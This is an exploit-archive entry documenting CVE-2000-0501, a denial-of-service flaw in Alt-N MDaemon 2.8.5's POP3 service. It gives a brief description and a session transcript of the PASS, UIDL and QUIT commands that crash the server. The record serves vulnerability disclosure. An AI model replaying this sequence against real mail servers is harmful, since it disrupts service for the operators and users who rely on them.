[] NeoSense
E X P L O I T S
title author type platform port cve id

Alt-N MDaemon 2.8.5 - UIDL Denial of Service

Author: Craig
type: dos
platform: windows
port: 
date_added: 2000-06-16 
date_updated: 2012-07-22 
verified: 1 
codes: CVE-2000-0501;OSVDB-1410 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/1366/info

A remote user is capable of crashing Alt-N MDaemon 2.8.5.0 by executing the pass command, then the UIDL command and quitting the mail server before the UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. Restarting the application is required in order to regain normal functionality.

Perform the following very quickly:

+OK <target> POP service ready using MDaemon
v2.8.5.0 T

User <username>
+OK <username>... Recipient ok
pass <password>
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK <username> <target> POP Server signing off (mailbox empty)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.